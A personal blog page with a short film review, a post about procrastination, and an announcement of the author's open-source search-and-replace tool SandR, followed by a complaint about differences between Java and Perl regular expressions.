The screenplay was good, and the film is paced well - barring a patch of 15 minutes before the movie picks up the pace again at the end. Audio (including music) design was adequate for the situations. Deep strings worked really well. The outdoor shots are convincing. Dubbing was quite well done. Though I thought there were places where the mood of the scene could have manipulated with some more innovative light designs.

All in all, the film is a worthy one to watch and Aparna scores again as a very competent director. I will be looking forward to her to get a great film, someday.

[An old post - recycled. I wrote it in February 2006]

Procrastinate

This is the middle of the week. A dose of procrastination will be good for you.


I have lifted it from somebody else's page. I don't know who created it or who holds the copyright. If you have information, please let me know - I will update this entry. Also, I had to scale down the image to fit in my page without messing up the formatting of the page. The full version is more interesting.

SandR, Java, Perl and Regular Expression

A couple of years ago, I wrote a small utility for searching and replacing text in files. At that time, I was looking for such a tool and found none that's suitable enough for my need. So I wrote it and released it as a open source software (OSS) so that others can freely download it, use it and if needed modify it. I called it SandR (pronounced as sand-arr). It was not hugely popular, people downloaded it sparingly. As of today there are altogether 1,288 downloads. I would love to see that number going up, nonetheless it was satisfying to know at least some people found it useful.

I released it as pre-alpha version, which in software business means, "Feel free to use it, but do expect to see bugs and crashes". Not too many bugs were reported in last two years. So, I decided to upgrade it to "Production/Stable" status. In the process I tweaked the code for minor enhancement. Today, I have requested a release.

The unique feature for SandR is that it supports auto-detection of file encoding. I used the Java port of Mozilla's Character detection algorithm for detecting the character encoding of the files. SandR also supports regular expression for search string, although there are some other similar OSS utilities which provide regex support.

It's really very useful that Java now supports regex or Regular Expression. Previously regex was the power tools for the Perl programmers only. GNU had a C library from regex, but it was really the forte of Perl. So when Java 5 started supporting regex, programmers welcomed it enthusiastically. However, as we delved more into it, we found there are some differences between Perl and Java regex, nothing major though. One conversant in one will have absolutely no difficulty in understanding and using it in the other. But why? Why there has to be two flavors of the same utility, however small may be the difference? Techies and programmers are using regex for ages. They have become very conversant with the Perl type. Then why, oh why, introduce a minor variation? This is so Microsofty. Sun can do better. I haven't tried Java 6 yet since I do not use Java in my day job regularly, but I doubt Sun has changed the regex implementation. Don't know the plans for upcoming Java 7 release. But let's request Sun to abolish whatever minor differences there are between Java implementation of regex with its Perl counterpart. You can do it, Sun.